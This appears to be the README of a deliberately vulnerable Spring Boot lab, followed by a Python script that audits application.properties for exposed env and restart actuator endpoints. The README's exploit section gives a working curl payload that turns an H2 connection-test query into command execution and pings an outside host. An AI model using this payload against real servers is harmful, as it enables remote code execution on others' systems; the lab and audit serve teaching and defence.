Sample Spring Boot App Demonstrating RCE via Exposed env Actuator and H2 Database
Latest commit 56c4b95 Jan 13, 2020
Repository contents (all from the first commit, Jan 12, 2020):

  src/main/java/hello
  target
  Dockerfile
  README.md
  application.properties
  mvnw
  mvnw.cmd
  pom.xml

README.md

Spring Boot Actuator H2 RCE

Introduction

This is a sample app based on the default Spring Boot app in Spring's documentation. It demonstrates how an attacker can achieve RCE on an instance that exposes the /actuator/env endpoint (writable via POST) and uses an H2 database: the attacker rewrites the datasource's connection-test query to an H2 CREATE ALIAS statement that executes a system command, then triggers /actuator/restart so the new query runs.

Usage

First, start the app. You can do this locally or with Docker.

Local

If you run this locally, you need JDK 1.8 or later and Maven 3.2+.

./mvnw package && java -jar target/gs-spring-boot-docker-0.1.0.jar

Docker

  1. sudo docker build -t spaceraccoon/spring-boot-rce-lab .
  2. sudo docker run -p 8080:8080 -t spaceraccoon/spring-boot-rce-lab

The app is now running on localhost:8080.

Exploit

  1. Modify the curl request accordingly, then run:

     curl -X 'POST' -H 'Content-Type: application/json' --data-binary $'{\"name\":\"spring.datasource.hikari.connection-test-query\",\"value\":\"CREATE ALIAS EXEC AS CONCAT(\'String shellexec(String cmd) throws java.io.IOException { java.util.Scanner s = new\',\' java.util.Scanner(Runtime.getRun\',\'time().exec(cmd).getInputStream()); if (s.hasNext()) {return s.next();} throw new IllegalArgumentException(); }\');CALL EXEC(\'curl http://x.burpcollaborator.net\');\"}' 'http://localhost:8080/actuator/env'
  2. curl -X 'POST' -H 'Content-Type: application/json' 'http://localhost:8080/actuator/restart'

You will receive a pingback.
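The two preconditions for this chain are both configuration: the env endpoint must be exposed over HTTP and writable, and the restart endpoint must be exposed and enabled. The script below is an added example (not code from the spring-boot-rce-lab repository) that audits an application.properties file for exactly those settings and reports the weak configuration beside a hardened one. The exposure keys management.endpoints.web.exposure.include and .exclude are standard Spring Boot keys; management.endpoint.restart.enabled and management.endpoint.env.post.enabled are the Spring Cloud Commons keys for the restart endpoint and the writable env endpoint, and their assumed defaults are noted in the comments. The two sample property files are constructed for this example.

```python
import re

# Endpoints whose HTTP exposure makes the env-rewrite + restart path possible.
DANGEROUS = ("env", "restart")

# Assumption: when the include key is absent, Boot 2.x exposes only health
# (older releases also info) over HTTP; neither is in DANGEROUS.
DEFAULT_INCLUDE = "health,info"


def parse_properties(text):
    """Minimal .properties parser: 'key=value' or 'key: value', '#'/'!' comments."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        m = re.match(r"([^=:\s]+)\s*[=:]?\s*(.*)$", line)
        if m:
            props[m.group(1)] = m.group(2).strip()
    return props


def _as_set(value):
    return {v.strip() for v in value.split(",") if v.strip()}


def is_exposed(endpoint, props):
    """True if the web exposure rules make `endpoint` reachable over HTTP.
    exclude wins over include, and '*' is a wildcard in either list."""
    include = _as_set(props.get("management.endpoints.web.exposure.include", DEFAULT_INCLUDE))
    exclude = _as_set(props.get("management.endpoints.web.exposure.exclude", ""))
    if endpoint in exclude or "*" in exclude:
        return False
    return endpoint in include or "*" in include


def _flag(props, key, default):
    return props.get(key, default).strip().lower() == "true"


def audit(text):
    """Return (tag, message) findings for one application.properties file."""
    props = parse_properties(text)
    findings = []

    env_exposed = is_exposed("env", props)
    # Assumption: the writable env endpoint is on unless explicitly disabled
    # (the default has varied across Spring Cloud releases).
    env_writable = env_exposed and _flag(props, "management.endpoint.env.post.enabled", "true")
    if env_exposed:
        findings.append(("env", "env endpoint exposed over HTTP"
                         + (" and writable via POST" if env_writable else " (read-only)")))

    # Assumption: the restart endpoint is off unless management.endpoint.restart.enabled=true.
    restart_on = is_exposed("restart", props) and _flag(props, "management.endpoint.restart.enabled", "false")
    if restart_on:
        findings.append(("restart", "restart endpoint exposed and enabled"))

    if env_writable and restart_on:
        findings.append(("env+restart",
                         "writable env plus restart reproduces the H2 connection-test-query RCE path"))
    return findings


# Constructed sample: the lab-style configuration.
WEAK = """
management.endpoints.web.exposure.include=*
management.endpoint.restart.enabled=true
"""

# Constructed sample: hardened configuration that keeps only health/info
# reachable and explicitly excludes the two dangerous endpoints.
HARDENED = """
management.endpoints.web.exposure.include=health,info
management.endpoints.web.exposure.exclude=env,restart
management.endpoint.env.post.enabled=false
"""

if __name__ == "__main__":
    for label, cfg in (("weak", WEAK), ("hardened", HARDENED)):
        print(label, audit(cfg) or "no findings")
```

Running the script prints three findings for the weak file and none for the hardened one. A wildcard include with an explicit exclude of env and restart also passes, which is why the check evaluates exclude before include rather than just looking for `*`.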
